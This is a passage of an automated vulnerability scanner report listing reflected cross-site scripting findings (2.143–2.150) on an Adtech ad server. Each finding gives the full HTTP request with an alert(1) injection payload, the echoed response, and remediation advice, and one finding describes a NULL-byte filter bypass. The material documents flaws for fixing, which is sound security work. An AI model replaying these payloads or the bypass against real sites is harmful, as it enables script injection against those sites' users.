User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19692

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
CKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5274/1283049/0/154/AdId=889431;BnId=28;itime=348848711;nodecode=yes;link=&d411c"-alert(1)-"7714f6d0503=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/
...[SNIP]...

2.143. http://adserver.adtechus.com/addyn/3.0/5274/1283049/0/154/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5274/1283049/0/154/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8426a'-alert(1)-'214fd1f0763 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5274/1283049/0/154/ADTECH;loc=100;target=_blank;misc=1290348039434;rdclick=&8426a'-alert(1)-'214fd1f0763=1 HTTP/1.1
Accept: */*
Referer: http://adserver.adtechus.com/adiframe/3.0/5235/1131606/0/154/ADTECH;cookie=info;target=_blank;key=key1+key2+key3+key4;grp=000001
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19698

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('1283049'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5274/1283049/0/154/AdId=889431;BnId=51;itime=348882815;nodecode=yes;link=&8426a'-alert(1)-'214fd1f0763=1')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE1283049+"'))";
AT_TARGET1283049="_self";
}
window.AT_ClickFn1283049= function (click)
{    cli
...[SNIP]...

2.144. http://adserver.adtechus.com/addyn/3.0/5274/1283052/0/170/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5274/1283052/0/170/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5910c"-alert(1)-"5ca7690b82d was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5274/1283052/0/170/ADTECH;loc=100;target=_blank;misc=1290348036818;rdclick=5910c"-alert(1)-"5ca7690b82d HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19670

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ICKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5274/1283052/0/170/AdId=889431;BnId=53;itime=348748645;nodecode=yes;link=5910c"-alert(1)-"5ca7690b82d") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/ad
...[SNIP]...

2.145. http://adserver.adtechus.com/addyn/3.0/5274/1283052/0/170/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5274/1283052/0/170/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a914'-alert(1)-'ac3f8ce7712 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5274/1283052/0/170/ADTECH;loc=100;target=_blank;misc=1290348036818;rdclick=9a914'-alert(1)-'ac3f8ce7712 HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19633

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
lick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('1283052'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5274/1283052/0/170/AdId=889431;BnId=35;itime=348778823;nodecode=yes;link=9a914'-alert(1)-'ac3f8ce7712')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE1283052+"'))";
AT_TARGET1283052="_self";
}
window.AT_ClickFn1283052= function (click)
{    click
...[SNIP]...

2.146. http://adserver.adtechus.com/addyn/3.0/5274/1283052/0/170/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5274/1283052/0/170/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7cb1b"-alert(1)-"51f3bb95bc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5274/1283052/0/170/ADTECH;loc=100;target=_blank;misc=1290348036818;rdclick=&7cb1b"-alert(1)-"51f3bb95bc0=1 HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19663

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
CKVAR[0]?AT_CLICKVAR[0]:"clickTAG";
var AT_MULTICLICKSTR="?"+AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlink/5274/1283052/0/170/AdId=889431;BnId=35;itime=348811803;nodecode=yes;link=&7cb1b"-alert(1)-"51f3bb95bc0=1") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/
...[SNIP]...

2.147. http://adserver.adtechus.com/addyn/3.0/5274/1283052/0/170/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5274/1283052/0/170/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3ac22'-alert(1)-'c021417b4a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5274/1283052/0/170/ADTECH;loc=100;target=_blank;misc=1290348036818;rdclick=&3ac22'-alert(1)-'c021417b4a8=1 HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: adserver.adtechus.com
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: CfP=1; JEB2=4CE6E57B6E651A454F57E65AF000985E; 1=AE775A24.133AFE.1.114457.4D.0.4CE91B1C.D5E75.8E869E.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 19663

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
ick || AT_MICROSITE!="")
{    AT_COUNT=''
if ('1283052'!='_ADFC'+'_CUID_') AT_COUNT=escape('http://adserver.adtechus.com/adlink/5274/1283052/0/170/AdId=889431;BnId=35;itime=348843525;nodecode=yes;link=&3ac22'-alert(1)-'c021417b4a8=1')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE1283052+"'))";
AT_TARGET1283052="_self";
}
window.AT_ClickFn1283052= function (click)
{    cli
...[SNIP]...

2.148. http://adserver.adtechus.com/addyn/3.0/5294.1/1352254/0/154/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5294.1/1352254/0/154/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %003fdeb"-alert(1)-"22e367bb81c was submitted in the loc parameter. This input was echoed as 3fdeb"-alert(1)-"22e367bb81c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /addyn/3.0/5294.1/1352254/0/154/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=494;misc=1290207940045;aduho=-360;rdclick=http://ads.olivebrandresponse.com/clk?2,13%3Bc0d42e6bca7c25a1%3B12c666437a4,0%3B%3B%3B1957494596,Z4UBACACDABhhFcAAAAAAG.XFwAAAAAAAABQAAoAAAAAAAEABQAGEm6kAwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAApDdkZiwBAAAAAAAAAGJkY2Q1NDc4LWY0MzEtMTFkZi05OWIyLTAwMzA0OGQ3NWFkNAAzmSoAAAA=,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965594%2F0%2F154%2FAdId%3D607818%3BBnId%3D1%3Bitime%3D208030407%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,%003fdeb"-alert(1)-"22e367bb81c HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?Z4UBACACDABhhFcAAAAAAG.XFwAAAAAAAABQAAoAAAAAAAEABQAGEm6kAwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABS9kVnn-cvCSgGzuUZ9Ln6FR.ZVOVl3K56snPZAAAAAA==,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965594%2F0%2F154%2FAdId%3D607818%3BBnId%3D1%3Bitime%3D208030407%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,Z%3D160x600%26x%3Dhttp%253A%252F%252Fadserver%252Eadtechus%252Ecom%252Fadlink%252F5214%252F965594%252F0%252F154%252FAdId%253D607818%253BBnId%253D1%253Bitime%253D208030407%253Bkey%253D%252527%252527aee2d%255F%255F%255F%255F%255F%252Ftitle%255F%255F%255F%255F%255F%255F%255F%255F%255F%255Fscript%255F%255F%255F%255F%255Falert%25281%2529%255F%255F%255F%255F%255F%252Fscript%255F%255F%255F%255F%255FHoyt%252520LLC%252520PoC%252520XSS%25252011%252D19%252D2010%253Bnodecode%253Dyes%253Blink%253D%2524%26s%3D786976%26_salt%3D2968669238%26X%3D5735503%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.toronto.com%252FsearchResults%253Fq%253D%27%27aee2d_____%252Ftitle__________script_____alert%281%29_____%252Fscript_____Hoyt%252520LLC%252520PoC%252520XSS%25252011-19-2010%26r%3D1,bdcd5478-f431-11df-99b2-003048d75ad4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
odecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,%003fdeb"-alert(1)-"22e367bb81c") + escape(AT_CLICK);
var AT_FLASHVARSSTR= "";
// if use microsite, dont add the first parameter
if (AT_MICROSITE=="") AT_FLASHVARSSTR = AT_CLICKVAR[0]+"=" + escape("http://adserver.adtechus.com/adlin
...[SNIP]...

2.149. http://adserver.adtechus.com/addyn/3.0/5294.1/1352254/0/154/ADTECH [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5294.1/1352254/0/154/ADTECH

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a5f25'-alert(1)-'17a006cae34 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5294.1/1352254/0/154/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=494;misc=1290207940045;aduho=-360;rdclick=http://ads.olivebrandresponse.com/clk?2,13%3Bc0d42e6bca7c25a1%3B12c666437a4,0%3B%3B%3B1957494596,Z4UBACACDABhhFcAAAAAAG.XFwAAAAAAAABQAAoAAAAAAAEABQAGEm6kAwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAApDdkZiwBAAAAAAAAAGJkY2Q1NDc4LWY0MzEtMTFkZi05OWIyLTAwMzA0OGQ3NWFkNAAzmSoAAAA=,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965594%2F0%2F154%2FAdId%3D607818%3BBnId%3D1%3Bitime%3D208030407%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,a5f25'-alert(1)-'17a006cae34 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?Z4UBACACDABhhFcAAAAAAG.XFwAAAAAAAABQAAoAAAAAAAEABQAGEm6kAwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABS9kVnn-cvCSgGzuUZ9Ln6FR.ZVOVl3K56snPZAAAAAA==,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965594%2F0%2F154%2FAdId%3D607818%3BBnId%3D1%3Bitime%3D208030407%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,Z%3D160x600%26x%3Dhttp%253A%252F%252Fadserver%252Eadtechus%252Ecom%252Fadlink%252F5214%252F965594%252F0%252F154%252FAdId%253D607818%253BBnId%253D1%253Bitime%253D208030407%253Bkey%253D%252527%252527aee2d%255F%255F%255F%255F%255F%252Ftitle%255F%255F%255F%255F%255F%255F%255F%255F%255F%255Fscript%255F%255F%255F%255F%255Falert%25281%2529%255F%255F%255F%255F%255F%252Fscript%255F%255F%255F%255F%255FHoyt%252520LLC%252520PoC%252520XSS%25252011%252D19%252D2010%253Bnodecode%253Dyes%253Blink%253D%2524%26s%3D786976%26_salt%3D2968669238%26X%3D5735503%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.toronto.com%252FsearchResults%253Fq%253D%27%27aee2d_____%252Ftitle__________script_____alert%281%29_____%252Fscript_____Hoyt%252520LLC%252520PoC%252520XSS%25252011-19-2010%26r%3D1,bdcd5478-f431-11df-99b2-003048d75ad4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
   if (!__bCodeFlushed) {
       var span = parent.document.createElement("SPAN"
...[SNIP]...
3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,a5f25'-alert(1)-'17a006cae34')
AT_VARSTRING="?cli"+"ckTAG=javascript:void(win"+"dow.open('"+AT_COUNT+AT_CLICK+"','','"+AT_MICROSITE1352254+"'))";
AT_TARGET1352254="_self";
}
window.AT_ClickFn1352254= function (click)
{    click=(isN
...[SNIP]...

2.150. http://adserver.adtechus.com/addyn/3.0/5294.1/1352254/0/154/ADTECH [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtechus.com
Path:   /addyn/3.0/5294.1/1352254/0/154/ADTECH

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6b4a'-alert(1)-'38701d47715 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /addyn/3.0/5294.1/1352254/0/154/ADTECH;loc=100;target=_blank;key=key1+key2+key3+key4;grp=494;misc=1290207940045;aduho=-360;rdclick=http://ads.olivebrandresponse.com/clk?2,13%3Bc0d42e6bca7c25a1%3B12c666437a4,0%3B%3B%3B1957494596,Z4UBACACDABhhFcAAAAAAG.XFwAAAAAAAABQAAoAAAAAAAEABQAGEm6kAwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAApDdkZiwBAAAAAAAAAGJkY2Q1NDc4LWY0MzEtMTFkZi05OWIyLTAwMzA0OGQ3NWFkNAAzmSoAAAA=,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965594%2F0%2F154%2FAdId%3D607818%3BBnId%3D1%3Bitime%3D208030407%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,&a6b4a'-alert(1)-'38701d47715=1 HTTP/1.1
Host: adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?Z4UBACACDABhhFcAAAAAAG.XFwAAAAAAAABQAAoAAAAAAAEABQAGEm6kAwAAAAAAMcgfAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACt.QEAAAAAAAIAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABS9kVnn-cvCSgGzuUZ9Ln6FR.ZVOVl3K56snPZAAAAAA==,http%3A%2F%2Fadserver.adtechus.com%2Fadlink%2F5214%2F965594%2F0%2F154%2FAdId%3D607818%3BBnId%3D1%3Bitime%3D208030407%3Bkey%3D%2527%2527aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____Hoyt%2520LLC%2520PoC%2520XSS%252011-19-2010%3Bnodecode%3Dyes%3Blink%3D%24,http%3A%2F%2Fwww.toronto.com%2Fsearchresults%3Fq%3D%27%27aee2d_____%2Ftitle__________script_____alert%281%29_____%2Fscript_____hoyt%2520llc%2520poc%2520xss%252011-19-2010,Z%3D160x600%26x%3Dhttp%253A%252F%252Fadserver%252Eadtechus%252Ecom%252Fadlink%252F5214%252F965594%252F0%252F154%252FAdId%253D607818%253BBnId%253D1%253Bitime%253D208030407%253Bkey%253D%252527%252527aee2d%255F%255F%255F%255F%255F%252Ftitle%255F%255F%255F%255F%255F%255F%255F%255F%255F%255Fscript%255F%255F%255F%255F%255Falert%25281%2529%255F%255F%255F%255F%255F%252Fscript%255F%255F%255F%255F%255FHoyt%252520LLC%252520PoC%252520XSS%25252011%252D19%252D2010%253Bnodecode%253Dyes%253Blink%253D%2524%26s%3D786976%26_salt%3D2968669238%26X%3D5735503%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.toronto.com%252FsearchResults%253Fq%253D%27%27aee2d_____%252Ftitle__________script_____alert%281%29_____%252Fscript_____Hoyt%252520LLC%252520PoC%252520XSS%25252011-19-2010%26r%3D1,bdcd5478-f431-11df-99b2-003048d75ad4
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4CD721666E651A444F57E65AF001514E; 1=AE7702EE.133AEA.4.11546B.1.0.4CE702EE.133AE8.8C3D07.145E.1

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript

__ADTECH_CODE__ = "";
__theDocument = document;
__theWindow = window;
__bCodeFlushed = false;

function __flushCode() {
